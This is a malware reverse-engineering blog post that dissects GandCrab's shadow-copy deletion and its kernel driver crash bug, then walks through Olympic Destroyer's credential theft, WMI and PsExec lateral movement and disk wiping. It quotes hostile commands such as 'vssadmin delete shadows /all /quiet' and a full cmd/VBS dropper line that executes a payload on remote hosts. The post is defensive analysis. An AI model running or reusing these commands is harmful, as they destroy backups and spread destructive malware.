Once all encryption threads are finished, the control flow goes way back to the mainFunction(). Here GandCrab deletes the shadow copies of the system to ensure a victim cannot simply restore his/her files. On Windows Vista or later GandCrab executes “wmic.exe” with the parameter “shadowcopy delete”. On Windows XP it calls “cmd.exe” with the parameter “vssadmin delete shadows /all /quiet” via ShellExecuteW(). Before returning from the mainFunction() to the main(), GandCrab waits for the previously spawned network thread, which is trying to contact the C&C to finish by calling WaitForSingleObject(). RANSOMWARE WITH A KERNEL DRIVER “EXPLOIT” Back in main(), GandCrab calls the function I called AntiStealth() at 0x00401270. The backstory of this function seems to be a somewhat personal feud between the author(s) of GandCrab and the security vendor Ahnlab, who released a “vaccine” against GandCrab. The details can be read here https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-author-bitter-after-security-vendor-releases-vaccine-app/ Previously, when analyzing the gathering of the system information during the MainFunction(), you could see an unused string taunting Ahnlab once again, saying there was a “full write-what-where condition with privelege escalation”, even providing a download link for an exploit proof of concept. In the blog post mentioned above, the alleged GandCrab author states that the “exploit will be an reputation hole for ahnlab for years”. Well see about that. First, the AntiStealth() function parses the time stamp in the PE header of “%windir%\\system32\\ntoskrnl.exe” and saves it for

later.

Second, the device with the path “\\.\AntiStealth_V3LITE30F” is opened by calling CreateFileW(). Note that this is the first bug in the driver: It does not set its access rights correctly, if a random process without admin privileges can open a private kernel device. Then three heap buffers with R/W access rights are allocated by calling VirtualAlloc(), the first two of size 0x200, the third of size

0x10.

After that, GandCrab checks if it is running as Wow64 process and if so, it uses the Heavens Gate technique to call x64 functions of ntdll. On x64 it uses NtDeviceIoControlFile() on x86 simply DeviceIoControl() to communicate with the kernel device. The actual “exploit” can fit into a single screenshot: First the IOCTL 0x82000010 is sent with the input buffer as seen above. Then a second IOCTL 0x8200001E is sent, which makes your system bluescreen if everything goes according to plan. The exploit is also mentioned by https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html. In this blogpost Fortinet states that they “were able to confirm this on Ahnlab V3 Lite 3.3.46.1 with TSFltDrv.sys file version 9.6.0.5“. However, that is not correct: The two IOCTL are not handled in TSFltDrv.sys, but in a driver called TfFRegNt.sys, of which I analyzed version 4.6.0.1 with the Sha256 2B07F2CA6FC566EF260D12B316249EEEBA45E6C853E5A9724149DCBEEF136839. In its x86 variant the driver has 275 functions, as identified by IDA and exposes at least a file system minifilter driver functionality. The function which handles the IOCTLs is placed at 0x0040921C, and it handles the IOCTL used in the exploit like this: Parsing the user buffer is done like this: First, a check on the value I called bExInitializeResourceLiteSucceeded is executed. It marks that during initialization of the driver a call to the WinAPI ExInitializeResourceLite() was successful. Then, by accessing the global variable I called kernelBase, which stores a copy of ntoskrnl.exe, which is read during initialization, and by executing the function getNtoskrnTimeStamplDword() at 0x0040318E, the time stamp in the PE header of ntoskrnl.exe is

extracted.

If the second DWORD of the buffer from user space is the correct time stamp, the global variable I called userBufferFirstDWORD is set to the first DWORD in the user buffer. Comparing this functionality with GandCrab’s code, the variable userBufferFirstDWORD is now set to 0xDEADBEEF. The second IOCTL is handled like this: At first, the user buffer is interpreted as a structure, which I called userObj. It has, besides other unimportant members, a length and a “buf”. With this information, several size and sanity checks are executed to ensure that the userObj does not exceed 0xff bytes in size. With the following function call to checkBufferRanges() at 0x0040912E, the driver ensures that userObj is within the user

provided buffer.

Afterwards, the driver calls handleUserBuffer() at 0x00408F76 in order to process the user input. The first two function calls map the MDL address of the IRP to a virtual address and then deserialize a string from the user buffer into a custom object which I called memObj. The memObj, as well as the mapped memory of the MDL and the second element of the userObj are then passed to another function which I called thisWayGoesToCrash() at

0x004052EA.

The first function call to findObjectInList() at 0x00406996 looks up a file handle by iterating over a driver internal linked list, comparing the list objects based on the user input. If some object is found, the function ExAcquireResourceSharedLite_onUserBuffer() at 0x0040606A is

called:

You might notice that the first argument of ExAcquireResourceSharedLite() is userBufferFirstDWORD, the very same buffer which was set with the first IOCTL. When the function call ExAcquireResourceSharedLite() is execute, Windows bluescreens. The crash dump analysis of Windbg looks like

this:

Note that the first argument is 0xDEADBF23, which is similar to the address 0xDEADBEEF, which was the first argument of ExAcquireResourceSharedLite(). Looking at the function in Ntoskrnl to see where the crash actually happened, we can see this code: The red marked area is where the crash happened. You can see a few lines above, that ecx got loaded by the instruction “lea ecx, ”, while edi was holding the first function argument. So 0xDEADBEEF + 0x34 = 0xDEADBF23, which is the memory referenced, which

caused the crash.

So, what is happening in Ahnlab’s driver? With the first IOCTL, you can give the kernel driver a pointer to an object which the kernel driver expects to be a ERESOURCE pointer. With the second IOCTL, the driver tries to acquire the resource object, and

thus crashes.

Is this really a “full write-what-where condition with privelege escalation” as the GandCrab authors state? In my humble opinion, no. There is no fully controllable write primitive and the exploit does not show any privilege escalation. You can specify an arbitrary memory location on which the WinAPI ExAcquireResourceSharedLite() gets executed. So, whatever the API does with the ERESOURCE object, you can do to an arbitrary memory location. In theory, a very skilled attacker might be able to use this to manipulate a memory address as one gadget. But without any further gadgets, it is very hard to create some kind of real working exploit

out of this.

So, I would say this is rather a denial of service bug, than a full write-what-where privilege escalation security issue.

COVERING ITS TRACKS

In case the driver bug did not bluescreen the system, GandCrab tries to delete itself by calling the function deleteSelfWithTimeout() at

0x004032CE.

It opens a new command line process, which first calls “timeout -c 5” and then deletes the current file from which GandCrab was started. After the command line process has been started, GandCrab ends its process by calling ExitProcess(). The intention of the timeout is most probably to give the current process enough time to end itself, before the newly started command line tries to delete it. It is funny to note that the command “timeout” has no switch “-c”. I could not make the timeout work with “-c” on Windows XP, 7, 8 or 10. ¯\_(ツ)_/¯ Nonetheless, in all my tests the start of the new process took a few milliseconds longer than exiting the GandCrab process, which is why the deletion always worked, although it is very racy.

CONCLUSION

When analyzing GandCrab, I was fascinated by the simplicity of the malware in comparison to its efficacy. This malware does on point what it aims to do: Encrypt as much files as possible as fast as possible with a strong encryption algorithm. There is not too much unnecessary code, e.g there is no persistency to

survive reboots.

One oddity that sticks out is the kernel driver exploit, which is probably intended to show off the GandCrab author(s) skills in order to gain a big media echo, which is important to support GandCrab‘s

affiliate model.

Author Robert Michel Posted on November 12,

2018

Find the code here:

https://github.com/GDATAAdvancedAnalytics/bindifflib Author Luca Ebach Posted on September 21, 2018September 21, 2018

Categories

meta Tags binary analysis

, Bindiff

DISSECTING OLYMPIC DESTROYER – A WALK-THROUGH

INTRODUCTION

After a destructive cyber attack had hit this year’s olympics, the malware was quickly dubbed _Olympic Destroyer._ Talos were fast to provide initial coverage

. A

malware explicitly designed to sabotage the computer systems of the Olympic opening ceremony sounded very interesting, but other duties were more pressing at that time, so analysis for pure curiosity had to wait. A few weeks later I had some free evenings on my hands and decided to combine a few interests of mine: Listening to music, consuming high quality whisky and analyzing malware – regrettably one of those things is frowned upon at work, and it’s not malware

analysis.

I had most of the binaries reversed and already written up a few pages, when Kaspersky released an article with some more details than previously publicly known. Having finished my work and focusing on the technical aspects of Olympic Destroyer, I think I can add several technical details about the malware. In the following expect plain and straight-forward binary analysis and reverse engineering in the form of a walk-through. Olympic Destroyer comes in two types. The first one is a little bit simpler. It was discovered by Talos, who published it in their comprehensive blog post. One example of this type has the Sha256 of edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9. The second type of the binary has, to the best of my knowledge, not yet been explicitly named, but it was implicitly analyzed by Kaspersky in their also very comprehensive blog post. One example has the Sha256

sum of

e8349cfcc422310c259688b0226cb14f5196a6daad77b622405282aeac89ab06. In the following blog post I will mainly describe the first type of Olympic Destroyer. At the end I will discuss the main differences between the two types, which revolve around the usage or non-usage of the well-known tool PsExec.

THE ORCHESTRATOR

In this part we will cover the innermost functionality of the Olympic Destroyer. As orientation point we will use the _main()_ function, from where on we will cover the single function calls step by step. Luckily Olympic Destroyer runs single threaded – except for the spreading functionality – which makes it easier to follow the execution one call after another. The analyzed orchestrator has a Sha256 of edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 and is 0x1C6800 (~1.7MB) in size. A lot of this size is made up of five resources, whose role will be explained later on. IDA detects 756 functions of which not even ten were automatically identified by IDA FLIRT in version 6.9, which made the analysis more time consuming. IDA version 6.95 seems to have a newer FLIRT database and a lot of functions are identified automatically, as I realized way too late. CONFIGURATION – OR NOT The _main()_ function is located at 0x004071E0. It creates a structure on the local stack, which I called “config” when starting to reverse the binary. Over the time I discovered that it is merely a state or a singleton data container – nonetheless I kept the name “config” for reasons of consistency. This structure is carried throughout many of the subsequent function calls, most of the time in the form of _thiscalls_ in the _ecx_ register. You can find the whole structure in the appendix section below. It contains different type of data, like simple integers, which for example describe the bitness of the OS with either the value 32 or 64 by dynamically resolving and calling _IsWow64Process_. Yes, the author(s) actually use full integers instead of encoding this information in a simple bit ¯\_(ツ)_/¯. Detecting the bitness of the system More interesting are probably the different paths of files dropped to the filesystem during runtime, which are also stored in this structure. I will describe them when writing about the resources. Additionally, we find some security related variables, like the security token information of the current user, which is gathered by calling _GetTokenInformation(TokenUser)_ and comparing the result against “S-1-5-18” (Local System), “S-1-5-19” (NT Authority Local Service), and “S-1-5-20” (NT Authority Network Service). Most important is probably the vector of objects, which contains domain names and domain credentials, that are used to spread laterally through the network. More about this later on when I will cover the

lateral movement.

After the config structure is initialized in 0x00406390 by nulling its members, it is dynamically filled with its respective values in the subsequent call to 0x00406500, where most of the previously mentioned values and information is generated. From then on, the config is ready for use and most values are only read instead of written – except for the file paths, which are generated more or less randomly on the fly when used and of course the credential vector, which gets expanded

a few calls later.

MAGICAL CODE INJECTIONS With a call to 0x004066C0 Olympic Destroyer checks for the existence of two files, which it uses to mark and avoid multiple runs of itself: * C:\ * %SystemDrive%\Users\Public\ If one of those files is found, the function which I called “selfDeleteInjectBinary” at 0x00405DD0 is executed. Most of this function is already described in Endgame’s blogpost at https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights, but somehow they either misinterpreted the feature, or missed the main point of the shellcode. I’m not sure what their intention was, but their blog post somehow does not say what the shellcode actually does

�\_(ツ)_/¯.

Olympic Destroyer starts an invisible “notepad.exe” by using the flags _CREATE_NO_WINDOW_ in _dwCreationFlags_ as well as _STARTF_USESHOWWINDOW_ in _StartupInfo.dwFlags_ and _SW_HIDE_ in _StartupInfo.wShowWindow_ before calling _CreateProcessW._ Starting an invisible Notepad Then it injects two blocks of data/code into the running notepad by calling _VirtualAllocEx_ and _WriteProcessMemory_. The first block contains addresses of APIs and the path to the current executable, the second one is a shellcode which uses the addresses of the first block. By calling _CreateRemoteThread_ the execution of the shellcode within

notepad is started.

After this injection, the main process exits by calling _ExitProcess_ while the execution of the injected thread runs in the process space of notepad. But all the shellcode does, is a simple delayed self-deletion mechanism: First it sleeps a configurable number of seconds. In our case it is five seconds. After that, the shellcode looks for the original path of Olympic Destroyer, which was passed by the first injected memory block by checking _GetFileAttributesW_ != _INVALID_FILE_ATTRIBUTES_. Then it tries to open the file with _CreateFileW_, gets the file size by calling _GetFileSize_ and then loops over the file size and calls _WriteFile_ with always one zero byte until the whole file is overwritten with zeros. After closing the file handle, the file is finally deleted with _DeleteFile_ and the shellcode calls _ExitProcess_ to end its execution. To sum it up: The code injection is simply a nulling and deletion mechanism to hide the traces of the main binary. SETTING THE MARKERS FOR SELF-DELETION The two files, which mark multiple runs of Olympic Destroyer, mentioned in the previous paragraph, are then created: Create infection markers Depending on the rights under which the binary is running, the markers in _C:\_ and %_COMMON_DOCUMENTS%_ are created. From then on, a second run of Olympic Destroyer will wipe the original executable. STEALING CREDENTIALS In the following call to 0x004065A0, we will dive into a very important feature of Olympic Destroyer: The stealing of credentials from the current system, which are later used for lateral movement. Olympic Destroyer contains five resources of type “BIN”. All of those resources are encrypted with AES. The calculation of the key is hard coded in the binary and can be described as a trivial MD5 hash of the string “123”. This hash is then concatenated twice in order to reach a key length of 256 bits for the AES algorithm. The evaluation of whether those shenanigans of symmetric cryptography with a hard coded key makes sense is left as an exercise for the reader. When stealing the credentials, at first the resource 101 is decrypted, written to a more or less randomly generated filename in %tmp%. “More or less” because the algorithm is based on calls to _GetTickCount()_ with _Sleeps_ in between the calls. After writing the decrypted resource to disk, a proper random string is generated by calling _CoCreateGuid_. The _GUID_ is then used as the name for a named pipe in the form _\\.\pipe\_, which is created by calling _CreateNamedPipeW_ and then used as inter process communication mechanism with the process, which is then started from the file written to %tmp%.

RESOURCE 101

When resource 101 is started, it also gets the name of the pipe to communicate with its parent process as well as the password “123” as arguments. The main task of resource 101 is to use the password to decrypt and execute another resource of type “BMP” embedded in the file of resource 101 and send a buffer with stolen credentials to its parent process. So, it’s a simple loader which transfers a buffer

via IPC.

The BMP resource is a DLL called “BrowserPwd.dll”. This DLL is not written to disk but parsed and loaded in memory. It seems that its only purpose is to steal credentials from the browsers Internet Explorer, Firefox and Chrome. In order to work with Firefox and Chrome, an SQLite library is compiled into the DLL, which makes up most of the DLL’s code. * For Internet Explorer it uses COM to iterate over the browsers history and then reads all autocomplete passwords from the registry in _Software\Microsoft\Internet Explorer\IntelliForms\Storage2_ and decrypts them using the WinAPI _CryptUnprotectData_. * For Firefox, the credentials are stolen from _sqlite _and_ logins.json_. The _nss3.dll_ from Firefox is used to decrypt the protected passwords. * For Chrome, the user’s database in _\Application Data\Google\Chrome\User Data\Default\Login Data_ is copied temporarily and then the credentials are read and decrypted by calling the WinAPI _CryptUnprotectData_. All stolen credentials are returned in a buffer which uses a special style of separating the single items. This buffer is constructed within the DLL and returned to its original loader, which is resource

101:

Stolen credentials are formatted in a certain way This buffer is then sent from the loader via the named pipe to its

parent process:

The loader of resource 101 uses the names pipe to transfer the buffer with the stolen credentials RESOURCE 102 AND 103 After resource 101 was executed, a second attempt to steal credentials is started, in case the current process could acquire debug privileges during initialization of the config object. In case it has those right, depending on the architecture of the operating system, either resource 102 (x86) or 103 (x64) is started. Both executables have the same logic as resource 101 – decrypt and load a DLL in memory, execute the DLL and return its buffer via IPC – only the payload in form of their internal DLL, the resource of type “BMP”, is different. Everything else stays the same. So, the question is, what are the DLLs in the resources of resource 102 and 103? For 103, the x64 version, I did not look into it in order to save some time, but I assume it’s the very same payload as in 102, only for x64 systems. For 102, which is an x86 binary, the loaded internal DLL seems to be a custom version of the well-known penetration testing tool Mimikatz, which, besides other nifty features, can dump credentials from a Windows system. I did not spend too much time in the analysis of this DLL, but a swift look (as in “1-2 hours”), compared with several matching functions, structures and strings from the original code of Mimikatz are strong indicators that this DLL has actually Mimikatz’ credential dumping capability. This assumption was also verified by dynamic analysis, where the binary was actually stealing the credentials of my analysis machine. Additionally, the author(s) of Olympic Destroyer named this DLL “kiwi86.dll”, which is a reference to the nickname “gentilkiwi”, who is the author of Mimikatz. After receiving the stolen credentials via the named pipes, Olympic Destroyer parses the received buffers and saves the credentials in its config structure. Then it returns its control flow to the main

function.

SAVING THE CREDENTIALS – OR HOW TO BUILD A NETWORK WORM Back in the main function, right after stealing credentials from browsers and by the power of Mimikatz, Olympic Destroyer creates a copy of itself in the %tmp% folder in 0x00404040. If this copy succeeds, the copied file is modified in the next function call to 0x00401FB0. Here the whole file is read into a buffer in the process’ memory. Then this buffer is searched for the byte marker _9E EC 87 D4 89 16 42 09 55 E2 74 E4 79 0B 42 4C_. Those bytes mark the beginning of the serialized credentials vector as an array: Hex dump of Olympic Destroyer I tried to mark the single elements of the array in different colors to describe them, but it turns out my MS Paint skills are really bad. So, you’ll just get a two pseudo structs defining what you can see around the red marked bytes: > _struct credentials_

> _{_

> _ byte marker;_ > _ WORD numberOfElements;_ > _ CREDENTIAL credentialArray;_

> _};_

> _struct CREDENTIAL_

> _{_

> _ WORD lengthOfUsername;_ > _ WORD lengthOfPassword;_ > _ char userName;_ > _ char password;_

> _}_

In our case there are 0x2C stolen credentials. The first block of credentials has a _username\domain_ string of 0x1B bytes length and has a password of 0x0C bytes length. Then the second block of credentials follows, and so on. Once Olympic Destroyer has located the array in its buffer, the array is written over with the serialized version of the current credentials vector of the config object. Then the executable modified in memory is written back to disk in the %tmp% directory. In other words: The list of credentials, which was present when Olympic Destroyer was executed first, is now updated with all credentials stolen during runtime. RESOURCE 104 AND 105 – PREPARING THE NEXT STEPS After updating a copy of itself with all stolen credentials, the execution flow returns to the main function where two consecutive calls to 0x00403F30 prepare the network spreading algorithm and the destructive parts. Both calls take a resource name as a first parameter for input and return a string with a path to a file. In this function Olympic Destroyer takes the same decryption algorithm as previously described and decrypts the resources 104 and 105. Both files are not yet executed but written to disk with a random filename in the %tmp% folder. Resource 104 is a simple copy of the well-known tool “PsExec” which can be used to execute commands and files on remote computers. It will come into play when I describe the lateral movement. Resource 105 though is the actual “Destroyer” of Olympic

Destroyer.

STARTING THE DESTROYER – FULFILLING THE REAL PURPOSE After writing resource 104 and 105 to %tmp%, the function at 0x00404220 is called with the path to resource 105 as an argument. Here nothing magical happens. The file from the resource is simply executed without a visible window/console and the function returns: Starting an invisible process From here on the destroyer from resource 105 is running. It has its own chapter later on.

LATERAL MOVEMENT

Once the destroyer part of Olympic Destroyer has been started in its own process, the main function calls 0x00406ED0 to start the network

spreading routine.

At first two sanity checks are made by calling _GetFileAttributesA_ in order to ensure that PsExec from resource 104 and the copy of Olympic Destroyer with the updated credentials list in the %tmp% folder exist. If both checks pass, a list of potential targets within the local

network is built:

With a call to 0x00406DD0 Olympic Destroyer utilizes the _GetIpNetTable_ API to enumerate all IPv4 addresses of the current ARP cache, thus getting all IP addresses the local machine had access to – considering ARP cache timeouts which can remove older entries, of

course.

The list of IPv4 addresses is then passed to the function at 0x004054E0, along with a pointer to the config object as well as the path to PsExec and the updated copy of Olympic Destroyer in the %tmp% folder. I think it is noteworthy that passing both paths to the files in %tmp% is completely superfluous, since they are already a part of the config object, which is also passed as argument. The function at 0x004054E0 is the heart of the spreading algorithm: First, it reads the updated copy of Olympic Destroyer into memory. Then it initializes a new structure with all information passed as arguments as well as some additional information, which is somehow not really used later on. After that it calls 0x00407680, where the spreading in the network begins: For each IP address, a new thread is spawned, which starts at 0x00407D40. This thread then loops over all credentials of the config object, trying to use WMI via COM objects in order to infect remote

computers:

Remote command execution The first important function for that is at 0x004045D0 (called _executeRemoteCmdline_), which gets one IP and one pair of credentials as input, as well as one command line to execute on the target machine – _outPtr_ is used to transport the return value. The whole function is a mess of COM calls, but I’ll try to explain their meaning anyways. Words in italic are quotes from the binary: This function creates a COM object of _CLSID {4590F811-1D3A-11D0-891F-00AA004B2E24}_ and _IID {dc12a687-737f-11cf-884d-00aa004b2e24}_ in order to remotely execute WMI commands. Then a connection to _\\\root\CIMV2_ is created and the credentials are applied by calling _CoSetProxyBlanket_. With the class _Win32_Process_ and the function _Create_ a _Commandline_ is executed on the remote computer. With “_Select * From Win32_ProcessStopTrace_” the event for the termination of the remote process is registered in order to read its _ExitStatus_ code

afterwards.

The executed command line is rather simple: _“cmd.exe /c (ping 0.0.0.0 > nul) && if exist %programdata%\\evtchk.txt (exit 5) else ( type nul > %programdata%\\evtchk.txt)”_ With the execution of _ping_ a short delay is introduced, since the execution waits for _ping_ to fail four times to ping the address _0.0.0.0_. Then, in case the file _%programdata%\evtchk._txt exists on the target system, the execution returns the exit code five. Otherwise said file is created and the execution finishes with its standard

error code of zero.

The return value of the remote command line is then read and is returned via _outPtr_ as a function argument from 0x004045D0. Interestingly the _outPtr_ is only written to in case of a successful remote execution. All error cases leave the _outPtr_ untouched. As the memory address of the target of _outPtr_ is initialized with zeros, the caller of 0x004045D0 is unable to distinguish between an error during the remote code execution (e.g. because of false credentials or an unavailable IP) and the successful write of _%programdata%\evtchk.txt_ file on the remote machine. ¯\_(ツ)_/¯ At 0x00404C30 the second interesting function (called _writeFileToRemoteRegistryAndExecuteCommandlineVbs)_ is located. It takes the target IP address as well as the credentials as input. It is very similar to the function 0x004045D0 described previously. The main difference is that by using the _StdRegProv_ class and the function _SetBinaryValue_ a registry key in _HKEY_CURRENT_USER\Environment_ with the name _Data_ is created on the remote computer. The value of the registry key an executable file, but interestingly it is not the copy of Olympic Destroyer with the updated credential list in %tmp%, as I would have expected, but it is the binary which is currently executed and thus does not contain any of the current system’s

credentials:

The remote spreading algorithm spreads the wrong binary After the binary is written to the remote registry, the function at 0x00404C30 calls the function at 0x004044B0. Here the function _Create_ of the COM class _Win32_Process_ is used to remotely execute another command line. This command line is already known from the Talos blog post. For readability I pretty-printed the commands:

> _cmd.exe /c _

> _(_

> _echo strPath = Wscript.ScriptFullName _ > _& echo.Set FSO = CreateObject^(\”Scripting.FileSystemObject\”^)

> _

> _& echo.FSO.DeleteFile strPath, 1 _ > _& echo.Set oReg = > GetObject^(\”winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv\”^)

> _

> _& echo.oReg.GetBinaryValue ^&H80000001, \”Environment\”, > \”Data\”, arrBytes _ > _& echo.Set writer = > FSO.OpenTextFile^(\”%ProgramData%\\%COMPUTERNAME%.exe\”, 2,

> True^) _

> _& echo.For i = LBound^(arrBytes^) to UBound^(arrBytes^) _ > _& echo.s = s ^& Chr^(arrBytes^(i^)^) _

> _& echo.Next _

> _& echo.writer.write s _ > _& echo.writer.close_ > _) > %ProgramData%\\_wfrcmd.vbs && cscript.exe > %ProgramData%\\_wfrcmd.vbs && %ProgramData%\\%COMPUTERNAME%.exe_ The first set of _echo_s outputs parts of a VB script, which are then written to _%ProgramData%\_wfrcmd.vbs_ by using the redirect operator “>”. Afterwards this file is executed via the _cscript_ interpreter before the executable _%ProgramData%\%COMPUTERNAME%.exe_ is executed. This executable is created during the runtime of the newly created VB script, which basically just reads the executable stored in _HKEY_CURRENT_USER\Environment\Data_ and writes it to _%ProgramData%\%COMPUTERNAME%.exe_. Back in 0x00405170, the function at 0x004045D0 (_executeRemoteCmdline_) is called a second time. This time it removes the file _%programdata%\evtchk.txt_, which was previously checked or created on the remote computer by executing the command line “_del %programdata%\evtchk.txt_”. To state the obvious, in case it got lost in all the text: _%programdata%\evtchk.txt_ is intended as a mutex object on the remote computer, which marks that a remote infection is currently ongoing. This avoids that two computers running Olympic Destroyer’s infection routine infect the same target at the very same time. Yet, as this file is deleted right after the infection, it does not avoid multiple infections of the same target in general, but only in parallel. While all previously mentioned remote infection threads are running, the main thread waits for their termination by calling _WaitForMultipleObjects_, where it waits for all spawned threads to

finish.

Once all threads are finished and back in the function 0x00406ED0, the control flow enters a loop, which iterates over all credentials and passes them to the function at 0x00406780. This function also has the purpose of enumerating network targets. Once again COM objects are

involved:

One main part of this function is the call to _NetGetDCName_, which gets the name of the primary domain controller. This name is formatted into the string “_%s\\root\\directory\\LDAP_” in order to use it with the same COM objects as before during the remote code execution (C_LSID {4590F811-1D3A-11D0-891F-00AA004B2E24}_ and _IID {dc12a687-737f-11cf-884d-00aa004b2e24})_ by using the credentials, which are passed as function arguments. If everything works so far, the statement “_SELECT ds_cn FROM ds_computer_” is executed in order to get all computer names from the current domain. Then, for each computer, by calling _GetAddrInfoW_ and _ntohl_ the domain names are resolved to IPs. A vector of IPs is returned from 0x00406780. The IPs are then passed to the already known function at 0x004054E0 in order to infect those computers remotely. When this IP enumeration and remote infection loop is finished, some objects and memory is cleaned up before the control flow returns back to the main function. SELF-DELETION – OR HOW TO HIDE YOUR TRACES, WELL, AT LEAST ONE OF

THE MANY…

The last step in the main function, before freeing the remaining objects and memory, is the call to the already described function “selfDeleteInjectBinary” at 0x00405DD0. This time the sleep interval is only three instead of five seconds. So the spawned process tries to wipe the binary of the parent process every three seconds until it succeeds. The control flow of Olympic Destroyer then leaves the _main_ function and the process exits, which will make the wiping of the binary possible. I think it is noteworthy that none of the other dropped files are deleted. Everything in %tmp% remains and also all infection markers described previously are still there.

THE DESTROYER

A big part of this component’s functionality can be described in one picture by looking at the main function: Destroyer main function After giving itself the _SeShutdownPrivilege_ and bluntly ignoring all potential erroneous API calls, the Destroyer calls the function at 0x00401000 (“_execProcAndWaitForTerminate_”) five times in a row

in order to:

* Delete all shadow copies without prompt to avoid restoring the

system

* Silently delete all backups created by the tool _wbadmin_ * Ignore all failures during boot and avoid starting the recovery

mode

* Clear system logs

* Clear security logs Then the function at 0x004012E8 (“deactivateAllActiveServices”) is called. The name in the screenshot is already a spoiler of the actual functionality: All services of the local computer are disabled. This is done by iterating over all possible types of services by calling _EnumServicesStatusW_ with the _dwServiceType__ parameter set to __0x13F__ and __dwServiceState_ to _SERVICE_STATE_ALL_, and then calling _ChangeServiceConfigW(SERVICE_DISABLED)_ for each service. In combination with the previously disabled recovery mode and deleted backups, this bricks the local system on the next boot. Back in the main function a thread is spawned which executes the function 0x004016BF (“wiperThread”). The main thread then sleeps for a fixed single hour before shutting down the system – no matter what the wiper thread did or didn’t do in the meantime. Note that this might also interrupt the spreading routine of Olympic Destroyer, which might still run. The first thing the wiper thread does is setting its own thread priority to _THREAD_PRIORITY_TIME_CRITICAL_ in order to get as much CPU cycles as possible. Then it recursively iterates over all available network resources with the APIs _WNetOpenEnumW_ and _WNetEnumResourceW_. Each available resource is temporarily mounted by calling _WNetAddConnection2W(CONNECT_TEMPORARY)_, yet the parameters for the username and password are set to zero, thus the current user’s credentials are used. It is important to note that the stolen credentials are not used here. This decouples the Destroyer logically from its parent process. For each successfully mounted resource the function at 0x00401441 is

called.

This function is also best described with a screenshot: Remote wiping functionality This function simply iterates recursively over all folders, starting at the mountpoint which is provided as an argument, and then destroys each single file that it finds: * Files equal or smaller to 1MB in size are completely written over

with zeros

* For files bigger than 1MB only the first 4096 bytes are nulled. Yet for most files this should be enough to render them useless The wiper thread does not communicate with the main thread and there is no synchronization in any way. No matter if the wiping already finished or not, the system is shut down after one hour. It might be a simple mistake to shut the system down after a fixed time: The wiping may not have wiped everything it can reach, or it could have already finished and the local computer is still useable until the shutdown. Additionally the remote spreading could still be

ongoing.

Yet, I think it is more likely that this feature is a well-planned and sophisticated time bomb: Imagine Olympic Destroyer spreading through a network, wiping all it could wipe for one hour, when suddenly one system after another shuts down and is unable to boot. DIFFERENT TYPES OF OLYMPIC DESTROYER As mentioned in the introduction, I found two different types of Olympic Destroyer. The simpler type was described previously. The second type has the very same functionality, it only adds a few more functions. Those additional functions have the purpose of extending the spreading functionality of Olympic Destroyer by leveraging _PsExec_, which was written to %tmp% but then ignored by the simpler

version.

USING PSEXEC

The additional function call is placed right after writing/checking the file _%programdata%\evtchk.txt_ and before the spreading function which uses COM objects and spreads the version of Olympic Destroyer which was not updated with the stolen credentials. This bugged behavior of spreading the wrong binary over COM exists in both

versions.

The additional call to PsExec is done in the following way: Format string for calling PsExec PsExec is started with several parameters: * The first three parameter identify the target computer and the credentials which are applied * Then the dialogue to confirm the EULA of PsExec is skipped with

“accepteula”

* “-d” runs PsExec in a non-interactive way, which means that the caller does not wait for PsExec to terminate * With “-s” the remote process is started with System rights (in case the credentials allow that) * “-c” and “-f” specify that the actually executed file is copied to the target computer and overwritten in case it already

exists

* The last parameter is the remotely executed file, which is obviously Olympic Destroyer This time the remotely executed binary is the copy of Olympic Destroyer in %tmp%, which was updated with the credentials stolen during the current run. The output buffer returned from PsExec is parsed for the string “started”, which indicates to Olympic Destroyer that its call was successful. A successful remote infection using PsExec breaks the loop which iterates over the credentials for a fixed target computer. Thus the target is only infected once and the bugged COM infection is

avoided.

A CRIPPLED WORM AND A CAPABLE WORM The simple version of Olympic Destroyer has some spreading functionality, although it is broken in the sense that the wrong binary is spread through the network. By not spreading the updated version of Olympic Destroyer, which contains the credentials stolen during the run, it loses a crucial part of its spreading capability: Assume we have a computer “A” with a logged in user who has the rights which allow remote spreading of Olympic Destroyer. And a computer “B”, which is in reach of A, but where no user is logged in. A third computer “C” is only reachable over B but not over A. If the simple version of Olympic Destroyer is executed on computer A, it will use the stolen credentials to infect computer B. But on computer B there are no credentials to steal, so it won’t be able to

infect computer C.

In other words: The simple version of Olympic Destroyer can only spread to computers which are “one hop” in distance. Yet, in most cases this should still be enough to infect a whole network, since a central Domain Controller is usually connected to most computers in the network. Spreading the more advanced version including the stolen credentials gives Olympic Destroyer even better worming capabilities, since it gathers more and more credentials as it spreads further and further

through a network.

In the previous example computer C could be infected from computer B by using the credentials stolen on computer A. CRUNCHING SOME NUMBERS In order to verify my findings with the two versions of Olympic Destroyer, I grabbed 36 different samples which are identified as Olympic Destroyer and compared their sets of stolen credentials. One sample had and empty list of credentials, so I discarded it. It turns out that 23 of those samples are from the simple version type. All of them contained the same set of credentials, which were already described by Talos. They are for the domains _g18.internal_ and _Pyeongchang2018.com_. All of the samples contained additional credentials stolen from various sandbox systems and virtual machines of researchers, who probably uploaded the files from the %tmp% folder to Virus Total during their analysis. I could not find a single sample which contained only a subset of the credentials stolen from the _g18.internal_ and _Pyeongchang2018.com_ domains. If you strip the credentials from sandboxes and researchers, all 23 samples contain the same set of crendetials. This supports the findings that the simple version of Olympic Destroyer has a broken spreading algorithm. In contrast to that, 12 samples of the total 36 are from the ATOS network with the domain _ww930_, as partially described by Kaspersky. Apparently the more capable version of Olympic Destroyer was spreading here, thus the differences in the list of credentials is bigger. The first pair of credentials in this set can be found in all 12 samples. But the rest of the credentials is a mix stolen from different computers in the same network. We can see that the worm took different paths when spreading though the network, acquiring the credentials of at least five different computers. After removing the credentials from researchers and sandboxes, we are left with five unique sets of credentials. If one subset of credentials is one letter, the sets can be described as A, AB, AC, AD and ADE. This shows that the more capable version of Olympic Destroyer actually inherits its list of stolen credentials to the infected

systems.

